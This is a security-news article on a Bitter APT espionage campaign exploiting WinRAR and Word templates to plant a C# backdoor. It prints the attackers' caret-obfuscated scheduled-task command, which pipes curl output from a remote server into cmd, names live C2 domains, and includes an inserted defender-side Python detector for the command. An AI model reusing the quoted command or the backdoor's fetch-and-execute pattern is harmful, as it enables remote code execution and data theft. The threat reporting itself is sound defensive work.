Bitter APT Hackers Exploit WinRAR Zero-Day Via Weaponized Word Documents to Steal Sensitive Data

In Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.

The Bitter APT group, also tracked as APT-Q-37 and known in China as 蔓灵花, has launched a sophisticated cyberespionage campaign targeting government agencies, military installations, and critical infrastructure across China and Pakistan.

The threat actor has deployed weaponized Microsoft Office documents that exploit a previously unknown zero-day vulnerability in WinRAR archive software to install custom C# backdoors on victim systems.

This multi-pronged attack demonstrates a significant evolution in the group’s technical capabilities and persistence mechanisms.

The campaign leverages two distinct infection vectors to deliver malicious payloads. The first method employs VBA macro-laden Excel files disguised as legitimate conference documentation, while the second exploits a WinRAR path traversal vulnerability predating CVE-2023-38088.

Both approaches ultimately deploy the same C# backdoor designed to exfiltrate sensitive data and execute arbitrary commands from remote servers.

The attackers carefully crafted their social engineering lures to target specific personnel within government and defense sectors, indicating prior reconnaissance and victim profiling.

Qianxin analysts identified the malicious activity in October 2024 after detecting anomalous network traffic patterns originating from compromised systems.

The researchers traced the infrastructure back to command-and-control servers hosted on the esanojinjasvc.com domain, which was registered in April 2024 specifically for this operation.

Analysis revealed that the backdoor communicates with multiple subdomains including msoffice.365cloudz.esanojinjasvc.com, employing sophisticated encryption techniques to evade network-based detection systems.

The attack chain begins when victims receive phishing emails containing malicious RAR archives with names like “Provision of Information for Sectoral for AJK.rar.”

Upon extraction with vulnerable WinRAR versions (7.11 or earlier), the archive exploits a path traversal flaw to overwrite the user’s Normal.dotm template file.

Incident overview (Source – Qianxin)

When Microsoft Word subsequently launches, it automatically loads the compromised template, triggering embedded macros that download and execute the winnsc.exe backdoor from the remote server koliwooclients.com using SMB network shares.

Persistence Mechanisms and Backdoor Functionality

The malware establishes persistence through multiple redundant mechanisms to ensure continued access.

The macro code implements a function called periperi() that creates a batch file named kefe.bat in the Windows Startup directory.

This script establishes a scheduled task titled “OneDriveUpdates1100988844” that executes every 26 minutes, making POST requests to hxxps://www.keeferbeautytrends.com/d6Z2.php.

The scheduled task command uses string obfuscation (caret-escaped characters and environment-variable splitting, as seen below) to evade signature-based detection:

s^ch^t^a^s^k^s /create /tn "OneDriveUpdates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"
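A defender-side normaliser for this kind of command line, added here as an example; it is not code from the article or from Qianxin. The sample command line is constructed to mirror the one above, with a placeholder domain and path, and the indicator names and thresholds are my own assumptions:

```python
"""Normalise cmd.exe caret/delayed-expansion obfuscation and flag indicators.

Hypothetical detector (not the article's or Qianxin's code). Input is a process
command line as an EDR or Sysmon event would record it."""
import re

# Constructed sample modelled on the obfuscated schtasks command in the article;
# the domain and PHP path are placeholders, not real infrastructure.
SAMPLE_CMDLINE = (
    's^ch^t^a^s^k^s /create /tn "OneDriveUpdates1100988844" /f /sc minute /mo 26 '
    '/tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& '
    'curl !565!//www.example.invalid/beacon.php?rz=%computername%SS | c^m^d"'
)

def strip_carets(s: str) -> str:
    """cmd.exe treats ^ as an escape character, so 's^ch^t^a^s^k^s' runs as 'schtasks'."""
    return s.replace("^", "")

def expand_delayed_vars(s: str) -> str:
    """Resolve 'set NAME=value' assignments and !NAME! delayed-expansion references."""
    env: dict = {}
    for name, value in re.findall(r"set\s+(\w+)=([^&\"]*)", s):
        # A value may reference variables set earlier (e.g. set 565=!765!!665!).
        env[name] = re.sub(r"!(\w+)!", lambda m: env.get(m.group(1), m.group(0)), value)
    return re.sub(r"!(\w+)!", lambda m: env.get(m.group(1), m.group(0)), s)

# Each check sees the raw line (for obfuscation artefacts) and the normalised line.
INDICATORS = {
    "caret_obfuscation": lambda raw, clean: raw.count("^") >= 3,
    "schtasks_create": lambda raw, clean: re.search(r"\bschtasks\b.*?/create", clean, re.I) is not None,
    "headless_conhost": lambda raw, clean: "conhost --headless" in clean.lower(),
    "curl_piped_to_cmd": lambda raw, clean: re.search(r"\bcurl\b[^|]*\|\s*cmd\b", clean, re.I) is not None,
    "hostname_beacon": lambda raw, clean: "%computername%" in clean.lower(),
}

def analyse(cmdline: str) -> dict:
    """Return the de-obfuscated command, the indicators it matched, and a verdict."""
    clean = expand_delayed_vars(strip_carets(cmdline))
    hits = [name for name, check in INDICATORS.items() if check(cmdline, clean)]
    # Assumed threshold: three or more independent indicators is worth an alert.
    return {"normalised": clean, "indicators": hits, "suspicious": len(hits) >= 3}

if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE)
    print(result["normalised"])
    print("indicators:", ", ".join(result["indicators"]))
```

Matching on the normalised line rather than the raw one is what lets a single rule catch any caret placement or variable naming the operator chooses.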

The C# backdoor employs AES encryption for string obfuscation through a dedicated decryption function named gjfdkgitjkg().

This function decrypts critical configuration data including C2 URLs, file paths, and POST parameters.

The backdoor continuously collects system information including the temporary directory path, operating system architecture, and hostname, transmitting this data to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.

Based on C2 server responses, the malware downloads additional executables, repairs their PE headers by adding the DOS signature {0x4D 0x5A}, validates the file structure, and executes them while reporting success or failure codes back to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php.
